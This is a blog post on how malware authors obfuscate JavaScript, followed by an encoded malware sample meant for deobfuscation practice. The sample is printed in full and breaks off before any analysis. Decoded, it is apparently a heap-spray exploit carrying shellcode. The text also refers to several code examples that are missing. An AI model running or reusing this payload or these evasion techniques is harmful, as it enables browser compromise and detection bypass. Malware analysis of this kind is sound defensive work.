Javascript Randomization Element and Data Obfuscation

Malware Leave a comment

Hi Friends,

Follow up my previous post about the javascript evasion technique that the malware creator uses code obfuscation to bypass the malware protection in the delivery phase. I want to share another method of javascript obfuscation by implementing randomization. Also, how to deobfuscate it

Elements Randomization

The malware creator may randomly change the javascript code elements without changing the semantics of the codes.

We can see from the above code that the code variables have been randomized. Besides the variable name, some spaces and random comments are injected into the code to make it is harder for human eyes on the static analysis process but this change without changing the semantic of the code itself. In the end, the code has a different static pattern where the impact the protection that based on hash protection will fail to detect

Data Obfuscation

Data obfuscation is to convert a variable or a constant into the computational results of one or several variables or constants. Two data obfuscation techniques have been wildly applied to a string object. One is string splitting. The other one is keyword substitution. String splitting is to convert a string into the concatenation of several substrings.

For example,

i = 20 can be rewritten i = 5 * 4, i = 15 + 5 or i = 1000 : 50

below is string obfuscation

Encoding Obfuscation

Typically, there are three ways to encode original code. The first way is to convert the code into escaped ASCII characters, Unicode, or hexadecimal representations. The second method uses customized encoding functions, where attackers usually use an encoding process to create the obfuscated code and attach a decoding function to decode it during execution.

Decoding the exact value with specific algorithm where in this case the value will be Xored with 94

Ok, I think it is better to have a walktrough on decoding a malware sample. Lets decode the sample below 

var gZJkRLU = "";
var QjxT = function(SpPpOcOYkShRNZy) {
  gZJkRLU += String.fromCharCode(SpPpOcOYkShRNZy ^ 94)
};
QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(56) + QjxT(43) + QjxT(48) + QjxT(61) + QjxT(42) + QjxT(55) + QjxT(49) + QjxT(48) + QjxT(126) + QjxT(45) + QjxT(46) + QjxT(44) + QjxT(63) + QjxT(39) + QjxT(1) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(118) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(37) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(40) + QjxT(63) + QjxT(44) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(114) + QjxT(126) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(110) + QjxT(38) + QjxT(102) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(43) + QjxT(48) + QjxT(59) + QjxT(45) + QjxT(61) + QjxT(63) + QjxT(46) + QjxT(59) + QjxT(118) + QjxT(124) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(110) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(63) + QjxT(107) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(103) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(111) + QjxT(109) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(106) + QjxT(102) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(110) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(63) + QjxT(59) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(107) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(59) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(56) + QjxT(56) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(56) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(106) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(58) + QjxT(61) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(103) + QjxT(109) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(107) + QjxT(58) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(103) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(106) + QjxT(102) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(103) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(103) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(106) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(107) + QjxT(59) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(111) + QjxT(102) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(63) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(105) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(60) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(58) + QjxT(58) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(106) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(59) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(61) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(63) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(109) + QjxT(104) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(110) + QjxT(103) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(56) + QjxT(104) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(111) + QjxT(59) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(104) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(59) + QjxT(111) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(61) + QjxT(103) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(105) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(104) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(61) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(107) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(58) + QjxT(58) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(63) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(102) + QjxT(106) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(102) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(110) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(56) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(103) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(107) + QjxT(58) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(63) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(102) + QjxT(107) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(103) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(107) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(107) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(63) + QjxT(104) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(105) + QjxT(107) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(103) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(58) + QjxT(56) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(111) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(61) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(56) + QjxT(111) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(60) + QjxT(103) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(107) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(61) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(109) + QjxT(106) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(110) + QjxT(103) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(106) + QjxT(105) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(63) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(63) + QjxT(107) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(56) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(105) + QjxT(111) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(61) + QjxT(111) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(103) + QjxT(104) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(103) + QjxT(63) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(63) + QjxT(61) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(103) + QjxT(105) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(107) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(103) + QjxT(56) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(107) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(58) + QjxT(107) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(107) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(105) + QjxT(56) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(59) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(58) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(111) + QjxT(103) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(63) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(107) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(63) + QjxT(61) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(59) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(106) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(103) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(58) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(103) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(61) + QjxT(109) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(61) + QjxT(107) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(102) + QjxT(104) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(56) + QjxT(61) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(109) + QjxT(106) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(108) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(105) + QjxT(105) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(103) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(111) + QjxT(107) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(60) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(61) + QjxT(58) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(59) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(104) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(56) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(58) + QjxT(56) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(61) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(63) + QjxT(59) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(59) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(110) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(59) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(106) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(110) + QjxT(58) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(61) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(56) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(59) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(59) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(105) + QjxT(56) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(111) + QjxT(58) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(63) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(61) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(110) + QjxT(59) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(58) + QjxT(59) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(102) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(56) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(104) + QjxT(58) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(58) + QjxT(56) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(110) + QjxT(58) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(59) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(61) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(107) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(104) + QjxT(56) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(56) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(60) + QjxT(61) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(58) + QjxT(58) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(59) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(107) + QjxT(56) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(102) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(58) + QjxT(56) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(56) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(107) + QjxT(56) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(102) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(106) + QjxT(105) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(63) + QjxT(105) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(56) + QjxT(108) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(111) + QjxT(105) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(105) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(103) + QjxT(104) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(105) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(107) + QjxT(104) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(59) + QjxT(105) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(107) + QjxT(104) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(59) + QjxT(105) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(56) + QjxT(104) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(56) + QjxT(104) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(105) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(56) + QjxT(104) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(61) + QjxT(108) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(111) + QjxT(104) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(109) + QjxT(104) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(108) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(56) + QjxT(104) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(104) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(58) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(106) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(104) + QjxT(109) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(111) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(107) + QjxT(109) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(107) + QjxT(109) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(104) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(110) + QjxT(102) + QjxT(110) + QjxT(124) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(43) + QjxT(48) + QjxT(59) + QjxT(45) + QjxT(61) + QjxT(63) + QjxT(46) + QjxT(59) + QjxT(118) + QjxT(124) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(58) + QjxT(110) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(58) + QjxT(110) + QjxT(58) + QjxT(124) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(41) + QjxT(54) + QjxT(55) + QjxT(50) + QjxT(59) + QjxT(126) + QjxT(118) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(112) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(57) + QjxT(42) + QjxT(54) + QjxT(126) + QjxT(98) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(117) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(1) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(126) + QjxT(115) + QjxT(126) + QjxT(118) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(112) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(57) + QjxT(42) + QjxT(54) + QjxT(126) + QjxT(117) + QjxT(126) + QjxT(108) + QjxT(110) + QjxT(119) + QjxT(101) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(112) + QjxT(45) + QjxT(43) + QjxT(60) + QjxT(45) + QjxT(42) + QjxT(44) + QjxT(55) + QjxT(48) + QjxT(57) + QjxT(118) + QjxT(110) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(1) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(1) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(45) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(126) + QjxT(31) + QjxT(44) + QjxT(44) + QjxT(63) + QjxT(39) + QjxT(118) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(56) + QjxT(49) + QjxT(44) + QjxT(126) + QjxT(118) + QjxT(40) + QjxT(63) + QjxT(44) + QjxT(126) + QjxT(55) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(110) + QjxT(126) + QjxT(101) + QjxT(126) + QjxT(55) + QjxT(126) + QjxT(98) + QjxT(126) + QjxT(111) + QjxT(108) + QjxT(110) + QjxT(110) + QjxT(126) + QjxT(101) + QjxT(126) + QjxT(55) + QjxT(117) + QjxT(117) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(1) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(45) + QjxT(5) + QjxT(55) + QjxT(3) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(117) + QjxT(126) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(35) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + 